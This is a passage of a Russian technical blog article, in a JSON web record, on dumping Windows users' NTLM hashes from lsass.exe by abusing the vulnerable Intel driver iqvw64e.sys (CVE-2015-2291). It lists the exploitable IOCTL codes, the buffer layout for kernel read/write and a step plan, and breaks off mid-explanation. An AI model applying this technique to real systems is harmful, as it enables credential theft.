{"id":329215,"date":"2022-02-07T15:01:14","date_gmt":"2022-02-07T15:01:14","guid":{"rendered":"http:\/\/savepearlharbor.com\/?p=329215"},"modified":"-0001-11-30T00:00:00","modified_gmt":"-0001-11-29T21:00:00","slug":"","status":"publish","type":"post","link":"https:\/\/savepearlharbor.com\/?p=329215","title":{"rendered":"<span>\u0418\u0437\u0432\u043b\u0435\u0447\u0435\u043d\u0438\u0435 NTLM hash \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0438\u0437 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430 lsass.exe \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0433\u043e \u0434\u0440\u0430\u0439\u0432\u0435\u0440\u0430<\/span>"},"content":{"rendered":"<div><\/div>\n<div id=\"post-content-body\">\n<div>\n<div class=\"article-formatted-body article-formatted-body_version-2\">\n<div xmlns=\"http:\/\/www.w3.org\/1999\/xhtml\">\n<p>\u041f\u0440\u0438\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u044e \u0432\u0430\u0441, \u0434\u043e\u0440\u043e\u0433\u0438\u0435 \u0447\u0438\u0442\u0430\u0442\u0435\u043b\u0438! \u0421\u0435\u0433\u043e\u0434\u043d\u044f \u044f \u0445\u043e\u0447\u0443 \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u0430\u0442\u044c \u043e \u0442\u043e\u043c, \u043a\u0430\u043a \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0433\u043e \u0434\u0440\u0430\u0439\u0432\u0435\u0440\u0430 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c NTLM hash \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f. NTLM hash \u043d\u0430\u0445\u043e\u0434\u0438\u0442\u0441\u044f \u0432 \u043f\u0430\u043c\u044f\u0442\u0438 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430 lsass.exe \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b Windows. \u041f\u0440\u043e\u0446\u0435\u0441\u0441 lsass.exe \u043e\u0442\u0432\u0435\u0447\u0430\u0435\u0442 \u0437\u0430 \u0430\u0432\u0442\u043e\u0440\u0438\u0437\u0430\u0446\u0438\u044e \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430.<\/p>\n<p>\u041f\u043e \u044d\u0442\u043e\u0439 \u0442\u0435\u043c\u0435 \u044f \u043d\u0430\u0448\u0435\u043b \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0441\u0442\u0430\u0442\u0435\u0439:<\/p>\n<ol>\n<li>\n<p><a href=\"https:\/\/adepts.of0x.cc\/physical-graffiti-lsass\/\">A physical graffiti of LSASS: getting credentials from physical memory for fun and learning.<\/a> <\/p>\n<\/li>\n<li>\n<p><a href=\"https:\/\/blog.vincss.net\/2021\/08\/ex007-how-playing-cs-go-helped-you-bypass-security-products.html\">[EX007] How playing CS: GO helped you bypass security products.<\/a> <\/p>\n<\/li>\n<\/ol>\n<p>\u0420\u0430\u0437\u043e\u0431\u0440\u0430\u0432 \u044d\u0442\u0438 \u0441\u0442\u0430\u0442\u044c\u0438, \u0443 \u043c\u0435\u043d\u044f \u043f\u043e\u044f\u0432\u0438\u043b\u043e\u0441\u044c \u0436\u0435\u043b\u0430\u043d\u0438\u0435 \u043e\u0431\u044a\u0435\u0434\u0438\u043d\u0438\u0442\u044c \u0438\u0445 \u0434\u043b\u044f \u043b\u0443\u0447\u0448\u0435\u0433\u043e \u043f\u043e\u043d\u0438\u043c\u0430\u043d\u0438\u044f \u043c\u0435\u0442\u043e\u0434\u0430 \u0438\u0437\u0432\u043b\u0435\u0447\u0435\u043d\u0438\u044f NTLM hash\u2019\u0430 \u0438\u0437 \u043f\u0430\u043c\u044f\u0442\u0438 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430 lsass.exe.<\/p>\n<p><strong>\u0412\u0430\u0436\u043d\u044b\u0435 \u0437\u0430\u043c\u0435\u0447\u0430\u043d\u0438\u044f<\/strong>: <\/p>\n<ul>\n<li>\n<p>\u0412\u0441\u0435 \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f \u0431\u0443\u0434\u0443\u0442 \u043f\u0440\u043e\u0432\u043e\u0434\u0438\u0442\u0441\u044f \u043d\u0430<strong> Windows 10 \u0432\u0435\u0440\u0441\u0438\u0438 1909<\/strong> \u0441\u0431\u043e\u0440\u043a\u0430 18363.1556.<\/p>\n<\/li>\n<li>\n<p>\u041d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0430\u043d\u043d\u043e\u0433\u043e \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f \u0434\u043b\u044f \u044d\u0442\u043e\u0439 \u0441\u0442\u0430\u0442\u044c\u0438 \u0431\u0443\u0434\u0435\u0442 <strong>shor.exe<\/strong>.\u00a0 <\/p>\n<\/li>\n<\/ul>\n<h2>\u0412\u0432\u0435\u0434\u0435\u043d\u0438\u0435.<\/h2>\n<p>\u0412 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 Windows \u0443 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430 \u0435\u0441\u0442\u044c \u0434\u0432\u0430 \u0440\u0435\u0436\u0438\u043c\u0430 \u0440\u0430\u0431\u043e\u0442\u044b \u2014 \u00abuser-mode\u00bb \u0438 \u00abkernel-mode\u00bb. \u0412\u043e \u0432\u0440\u0435\u043c\u044f \u0440\u0430\u0431\u043e\u0442\u044b \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430 \u0440\u0435\u0436\u0438\u043c\u044b \u043f\u0435\u0440\u0435\u043a\u043b\u044e\u0447\u0430\u044e\u0442\u0441\u044f \u043c\u0435\u0436\u0434\u0443 \u0441\u043e\u0431\u043e\u0439 \u0441\u0440\u0435\u0434\u0441\u0442\u0432\u0430\u043c\u0438 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b Windows.<\/p>\n<p>\u0420\u0430\u0441\u0441\u043c\u043e\u0442\u0440\u0438\u043c \u0440\u0430\u0437\u043b\u0438\u0447\u0438\u044f \u043c\u0435\u0436\u0434\u0443 \u00abuser-mode\u00bb \u0438 \u00abkernel-mode\u00bb:<\/p>\n<ul>\n<li>\n<p>\u041a\u043e\u0434, \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u044b\u0439 \u0432 user-mode, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0438\u0437\u043e\u043b\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0435 \u0432\u0438\u0440\u0442\u0443\u0430\u043b\u044c\u043d\u043e\u0435 \u0430\u0434\u0440\u0435\u0441\u043d\u043e\u0435 \u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0441\u0442\u0432\u043e. \u0418\u0437-\u0437\u0430 \u044d\u0442\u043e\u0433\u043e \u043e\u0434\u0438\u043d \u043f\u0440\u043e\u0446\u0435\u0441\u0441 \u043d\u0435 \u043c\u043e\u0436\u0435\u0442 \u0438\u0437\u043c\u0435\u043d\u044f\u0442\u044c \u0434\u0430\u043d\u043d\u044b\u0435, \u043f\u0440\u0438\u043d\u0430\u0434\u043b\u0435\u0436\u0430\u0449\u0438\u0435 \u0434\u0440\u0443\u0433\u043e\u043c\u0443 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0443. \u041f\u043e\u043c\u0438\u043c\u043e \u0442\u043e\u0433\u043e, \u0447\u0442\u043e \u0432\u0438\u0440\u0442\u0443\u0430\u043b\u044c\u043d\u043e\u0435 \u0430\u0434\u0440\u0435\u0441\u043d\u043e\u0435 \u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0441\u0442\u0432\u043e \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430 \u0432 user-mode \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0438\u0437\u043e\u043b\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u043c, \u043e\u043d\u043e \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u043e. \u041e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u0438\u0435 \u0432\u0438\u0440\u0442\u0443\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0430\u0434\u0440\u0435\u0441\u043d\u043e\u0433\u043e \u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0441\u0442\u0432\u0430 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430 \u0432 user-mode \u043f\u0440\u0435\u0434\u043e\u0442\u0432\u0440\u0430\u0449\u0430\u0435\u0442 \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u0435 \u0438 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u044b\u0435 \u043f\u043e\u0432\u0440\u0435\u0436\u0434\u0435\u043d\u0438\u044f \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0432\u0430\u0436\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445 \u0432 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u0435. <\/p>\n<\/li>\n<li>\n<p>\u041a\u043e\u0434, \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u044b\u0439 \u0432 kernel-mode, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u043e\u0434\u043d\u043e \u0432\u0438\u0440\u0442\u0443\u0430\u043b\u044c\u043d\u043e\u0435 \u0430\u0434\u0440\u0435\u0441\u043d\u043e\u0435 \u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0441\u0442\u0432\u043e. \u042d\u0442\u043e \u0437\u043d\u0430\u0447\u0438\u0442, \u0447\u0442\u043e \u0434\u0440\u0430\u0439\u0432\u0435\u0440 kernel-mode \u043d\u0435 \u0438\u0437\u043e\u043b\u0438\u0440\u043e\u0432\u0430\u043d \u043e\u0442 \u0434\u0440\u0443\u0433\u0438\u0445 \u0434\u0440\u0430\u0439\u0432\u0435\u0440\u043e\u0432 \u0438 \u0441\u0430\u043c\u043e\u0439 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u044b. <\/p>\n<\/li>\n<\/ul>\n<p>\u0418\u0437-\u0437\u0430 \u0442\u043e\u0433\u043e, \u0447\u0442\u043e \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u044e\u0442 \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u044b, \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0438\u0432\u0430\u044e\u0449\u0438\u0435 \u0434\u043e\u0441\u0442\u0443\u043f \u043a lsass.exe \u0432 user-mode, \u043c\u043d\u0435 \u043f\u0440\u0435\u0434\u0441\u0442\u043e\u0438\u0442 \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u043e\u0432\u0430\u0442\u044c \u0441 lsass.exe \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0433\u043e \u0434\u0440\u0430\u0439\u0432\u0435\u0440\u0430, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043c\u043e\u0436\u0435\u0442 \u0434\u043e\u0441\u0442\u0430\u0432\u0430\u0442\u044c \u043f\u043e\u043b\u0435\u0437\u043d\u0443\u044e \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044e \u0438\u043b\u0438 \u043f\u0435\u0440\u0435\u0437\u0430\u043f\u0438\u0441\u044b\u0432\u0430\u0442\u044c \u043f\u0430\u043c\u044f\u0442\u044c \u0432 kernel-mode.<\/p>\n<p>\u0414\u043b\u044f \u0442\u043e\u0433\u043e, \u0447\u0442\u043e\u0431\u044b \u043f\u043e\u043b\u043d\u043e\u0446\u0435\u043d\u043d\u043e \u0438\u0437\u0443\u0447\u0438\u0442\u044c \u0438\u0437\u0432\u043b\u0435\u0447\u0435\u043d\u0438\u0435 NTLM hash \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0438\u0437 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430 lsass.exe \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0433\u043e \u0434\u0440\u0430\u0439\u0432\u0435\u0440\u0430, \u044f \u0441\u043e\u0441\u0442\u0430\u0432\u0438\u043b \u043d\u0435\u0431\u043e\u043b\u044c\u0448\u043e\u0439 \u043f\u043b\u0430\u043d \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0439:<\/p>\n<ol>\n<li>\n<p>\u041d\u0430\u0439\u0442\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0439 \u0434\u0440\u0430\u0439\u0432\u0435\u0440 \u0434\u043b\u044f \u0447\u0442\u0435\u043d\u0438\u044f \u0438 \u0437\u0430\u043f\u0438\u0441\u0438 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u0432 kernel-mode. <\/p>\n<\/li>\n<li>\n<p>\u041f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u0438\u0437 kernel-mode \u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0443 <a href=\"https:\/\/www.ired.team\/miscellaneous-reversing-forensics\/windows-kernel-internals\/how-kernel-exploits-abuse-tokens-for-privilege-escalation#_eprocess\">EPROCESS<\/a> \u0434\u043b\u044f \u0434\u0432\u0443\u0445 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u043e\u0432 lsass.exe \u0438 shor.exe. \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043f\u043e\u0442\u043e\u043c \u0431\u0443\u0434\u0443\u0442 \u043f\u0435\u0440\u0435\u0434\u0430\u043d\u044b \u0432 <a href=\"http:\/\/www.codewarrior.cn\/ntdoc\/wrk\/mm\/MmCopyVirtualMemory.htm\">MmCopyVirtualMemory<\/a>, \u0447\u0442\u043e\u0431\u044b \u0438\u0437\u0432\u043b\u0435\u0447\u044c\u00a0 \u043f\u0430\u043c\u044f\u0442\u0438 \u0438\u0437 user-mode.<\/p>\n<\/li>\n<li>\n<p>\u0421 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0445 <a href=\"https:\/\/docs.microsoft.com\/en-us\/windows-hardware\/drivers\/debugger\/-vad\">VAD<\/a> (Virtual Address Descriptor) \u0443\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u0435\u0439 \u0432 kernel-mode, \u043d\u0430\u0439\u0442\u0438 \u0432\u0438\u0440\u0442\u0443\u0430\u043b\u044c\u043d\u044b\u0435 \u0430\u0434\u0440\u0435\u0441\u0430 \u0432 user-mode, \u0434\u043b\u044f \u043f\u043e\u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0433\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044f \u0432 \u0444\u0443\u043d\u043a\u0446\u0438\u0438 MmCopyVirtualMemory.<\/p>\n<\/li>\n<li>\n<p>\u0420\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0430\u0442\u044c <a href=\"https:\/\/codeby.net\/threads\/hello-world-v-vide-shell-koda-osobennosti-napisanija-shell-kodov.76477\/\">shellcode<\/a> \u0434\u043b\u044f kernel-mode, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0431\u0443\u0434\u0435\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c \u0444\u0443\u043d\u043a\u0446\u0438\u044e MmCopyVirtualMemory. <\/p>\n<\/li>\n<li>\n<p>\u0418\u0437\u0432\u043b\u0435\u0447\u044c NTLM hash \u0438\u0437 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430 lsass.exe.<\/p>\n<\/li>\n<\/ol>\n<h2>1. \u041f\u043e\u0438\u0441\u043a \u0434\u0440\u0430\u0439\u0432\u0435\u0440\u0430.<\/h2>\n<p>\u041f\u043e\u0438\u0441\u043a \u0434\u0440\u0430\u0439\u0432\u0435\u0440\u0430, \u043e\u0431\u043b\u0430\u0434\u0430\u044e\u0449\u0435\u0433\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c\u044e \u0447\u0442\u0435\u043d\u0438\u044f \u0438 \u0437\u0430\u043f\u0438\u0441\u0438 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u0432 kernel-mode, \u043f\u0440\u0438\u0432\u0451\u043b \u043c\u0435\u043d\u044f \u043a \u043f\u0440\u043e\u0435\u043a\u0442\u0443 <a href=\"https:\/\/github.com\/hfiref0x\/KDU\">KDU<\/a>. \u042d\u0442\u043e\u0442 \u043f\u0440\u043e\u0435\u043a\u0442 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0442\u044c \u043d\u0435 \u043f\u043e\u0434\u043f\u0438\u0441\u0430\u043d\u043d\u044b\u0435 \u0434\u0440\u0430\u0439\u0432\u0435\u0440\u0430 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043f\u043e\u0434\u043f\u0438\u0441\u0430\u043d\u043d\u044b\u0445, \u043d\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u0434\u0440\u0430\u0439\u0432\u0435\u0440\u043e\u0432. \u041e\u0434\u043d\u0438\u043c \u0438\u0437 \u0442\u0430\u043a\u0438\u0445 \u0434\u0440\u0430\u0439\u0432\u0435\u0440\u043e\u0432: <strong>iqvw64e.sys<\/strong>.<\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"\/img\/image-loader.svg\" height=\"190\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/581\/274\/5b9\/5812745b93571cecea49099e85943837.png\" data-width=\"845\"\/><figcaption><\/figcaption><\/figure>\n<p>\u0412 README.md \u043f\u0440\u043e\u0435\u043a\u0442\u0430 KDU \u0435\u0441\u0442\u044c \u043d\u043e\u043c\u0435\u0440 CVE <a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2015-2291\">2015-2291<\/a> \u0438 \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0434\u043b\u044f \u044d\u0442\u043e\u0433\u043e \u0434\u0440\u0430\u0439\u0432\u0435\u0440\u0430. \u0412 \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0438 \u0441\u043a\u0430\u0437\u0430\u043d\u043e, \u0447\u0442\u043e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0432\u0441\u0435\u043c \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c \u0432\u044b\u0437\u0432\u0430\u0442\u044c \u043e\u0442\u043a\u0430\u0437 \u0432 \u043e\u0431\u0441\u043b\u0443\u0436\u0438\u0432\u0430\u043d\u0438\u0438 \u0438\u043b\u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434 \u0441 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u044f\u043c\u0438 \u044f\u0434\u0440\u0430 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0432\u044b\u0437\u043e\u0432\u0430 <a href=\"https:\/\/docs.microsoft.com\/en-us\/windows\/win32\/devio\/device-input-and-output-control-ioctl-\">IOCTL<\/a> 0x80862013, 0x8086200B, 0x8086200F \u0438\u043b\u0438 0x80862007.<\/p>\n<p>\u041f\u043e\u0441\u043b\u0435 \u0432\u044b\u0431\u043e\u0440\u0430 \u0434\u0440\u0430\u0439\u0432\u0435\u0440\u0430 \u044f \u043d\u0430\u0448\u0435\u043b \u043f\u0440\u043e\u0435\u043a\u0442 \u043d\u0430 github \u043e\u043f\u0438\u0441\u044b\u0432\u0430\u044e\u0449\u0438\u0439 \u0434\u0430\u043d\u043d\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c <a href=\"https:\/\/github.com\/Tare05\/Intel-CVE-2015-2291\">Intel-CVE-2015-2291<\/a>. \u0418\u0437 \u044d\u0442\u043e\u0433\u043e \u043f\u0440\u043e\u0435\u043a\u0442\u0430 \u0432\u0437\u044f\u043b \u043a\u043e\u0434 \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f \u0438\u0437 user-mode \u0441 \u0434\u0440\u0430\u0439\u0432\u0435\u0440\u043e\u043c kernel-mode:<\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"\/img\/image-loader.svg\" height=\"420\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/f9b\/6e3\/2e9\/f9b6e32e974bcee87f0068df2a3c7ac5.png\" data-width=\"1197\"\/><figcaption><\/figcaption><\/figure>\n<details class=\"spoiler\">\n<summary> \u0420\u0430\u0437\u0431\u043e\u0440 \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f \u0441 \u0434\u0440\u0430\u0439\u0432\u0435\u0440\u043e\u043c<\/summary>\n<div class=\"spoiler__content\">\n<p>\u041f\u0435\u0440\u0435\u0434\u0430\u0432\u0430\u0435\u043c\u044b\u0439 IOCTL 0x80862007 \u0432 <a href=\"https:\/\/docs.microsoft.com\/en-us\/windows\/win32\/api\/ioapiset\/nf-ioapiset-deviceiocontrol\">DeviceIoControl<\/a>.   <\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"\/img\/image-loader.svg\" height=\"169\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/9be\/9fe\/6a9\/9be9fe6a99fec5291afa4af6be1998a4.png\" data-width=\"645\"\/><figcaption><\/figcaption><\/figure>\n<p>\u041f\u0435\u0440\u0435\u0434\u0430\u0432\u0430\u0435\u043c\u044b\u0439 \u0431\u0443\u0444\u0435\u0440 \u0432 DeviceIoControl.<\/p>\n<p>QWORD switch_num (a1) \u2014 \u043d\u043e\u043c\u0435\u0440 \u0432 switch.<\/p>\n<p>QWORD (a1+8) \u2014 \u043d\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f.<\/p>\n<p>QWORD sourse (a1+16) \u2014 \u0443\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u044c \u043d\u0430 \u0431\u043b\u043e\u043a \u043f\u0430\u043c\u044f\u0442\u0438 \u0438\u0441\u0442\u043e\u0447\u043d\u0438\u043a.<\/p>\n<p>QWORD dest (a1+24) \u2014 \u0443\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u044c \u043d\u0430 \u0431\u043b\u043e\u043a \u043f\u0430\u043c\u044f\u0442\u0438 \u043d\u0430\u0437\u043d\u0430\u0447\u0435\u043d\u0438\u044f.<\/p>\n<p>QWORD count (a1+32) \u2014 \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e<br \/> \u043a\u043e\u043f\u0438\u0440\u0443\u0435\u043c\u044b\u0445 \u0431\u0430\u0439\u0442\u043e\u0432.<\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"\/img\/image-loader.svg\" height=\"229\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/c94\/01d\/ca4\/c9401dca409f94a9589e5d597e81de2a.png\" data-width=\"711\"\/><figcaption><\/figcaption><\/figure>\n<p>\u0424\u0443\u043d\u043a\u0446\u0438\u044f <a href=\"http:\/\/cppstudio.com\/post\/682\/\">memmove<\/a> \u0431\u0443\u0434\u0435\u0442 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0430 \u0434\u0440\u0430\u0439\u0432\u0435\u0440\u043e\u043c \u0434\u043b\u044f \u0447\u0442\u0435\u043d\u0438\u044f \u0438 \u0437\u0430\u043f\u0438\u0441\u0438 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u0432 kernel-mode.<\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"\/img\/image-loader.svg\" height=\"220\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/a85\/887\/78f\/a8588778fd97b7baccfd39bfd23bf78d.png\" data-width=\"646\"\/><figcaption><\/figcaption><\/figure>\n<\/div>\n<\/details>\n<h2>2. \u041f\u043e\u0438\u0441\u043a EPROCESS \u0434\u043b\u044f lsass.exe \u0438 shor.exe.<\/h2>\n<p>\u041a\u0430\u0436\u0434\u044b\u0439 \u043f\u0440\u043e\u0446\u0435\u0441\u0441 \u0432 \u043f\u0430\u043c\u044f\u0442\u0438 \u044f\u0434\u0440\u0430 \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u0435\u043d <a href=\"https:\/\/www.vergiliusproject.com\/kernels\/x64\/Windows%2010%20%7C%202016\/1909%2019H2%20(November%202019%20Update)\/_EPROCESS\">\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u043e\u0439<\/a> EPROCESS. \u042d\u0442\u0430 \u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0430 \u043c\u0435\u043d\u044f\u0435\u0442\u0441\u044f \u043e\u0442 \u0432\u0435\u0440\u0441\u0438\u0438 \u043a \u0432\u0435\u0440\u0441\u0438\u0438 Windows NT, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u044f \u043d\u0435 \u0431\u0443\u0434\u0443 \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442\u044c \u0435\u0451 \u0446\u0435\u043b\u0438\u043a\u043e\u043c, \u0430 \u0440\u0430\u0441\u0441\u043c\u043e\u0442\u0440\u044e \u0442\u043e\u043b\u044c\u043a\u043e \u043d\u0443\u0436\u043d\u044b\u0435 \u043c\u043d\u0435 \u0447\u0430\u0441\u0442\u0438.   <\/p>\n<p>ActiveProcessLinks (<a href=\"https:\/\/www.ired.team\/miscellaneous-reversing-forensics\/windows-kernel-internals\/manipulating-activeprocesslinks-to-unlink-processes-in-userland#_list_entry\">LIST_ENTRY<\/a>) \u2013 \u044d\u0442\u043e \u044d\u043b\u0435\u043c\u0435\u043d\u0442 \u0434\u0432\u0443\u0445\u0441\u0432\u044f\u0437\u043d\u043e\u0433\u043e \u0441\u043f\u0438\u0441\u043a\u0430, \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0449\u0438\u0439 \u0443\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u0438 FLink (\u043d\u0430 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0439 \u043f\u0440\u043e\u0446\u0435\u0441\u0441 \u0432 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 Windows) \u0438 BLink (\u043d\u0430 \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0438\u0439 \u043f\u0440\u043e\u0446\u0435\u0441\u0441 \u0432 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 Windows):<\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"\/img\/image-loader.svg\" height=\"309\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/5f0\/35b\/bfa\/5f035bbfacba2e4fde1ea7f528afc057.png\" data-width=\"1182\"\/><figcaption><\/figcaption><\/figure>\n<p>ImageFileName \u2013 \u0438\u043c\u044f \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430.<\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"\/img\/image-loader.svg\" height=\"26\" data-src=\"https:\/\/habrastorage.org\/getpro\/habr\/upload_files\/6ee\/925\/90a\/6ee92590af123bea0937c160233b3055.png\" data-width=\"678\"\/><figcaption><\/figcaption><\/figure>\n<p>VadRoot \u2013 AVL \u0434\u0435\u0440\u0435\u0432\u043e \u0432 \u043a\u043e\u0442\u043e\u0440\u043e\u043c \u043d\u0430\u0445\u043e\u0434\u044f\u0442\u0441\u044f \u0443\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u0438 VAD (Virtual Address Descriptor).   <\/p>\n<figure class=\"full-width\"><img decoding=\"async\" 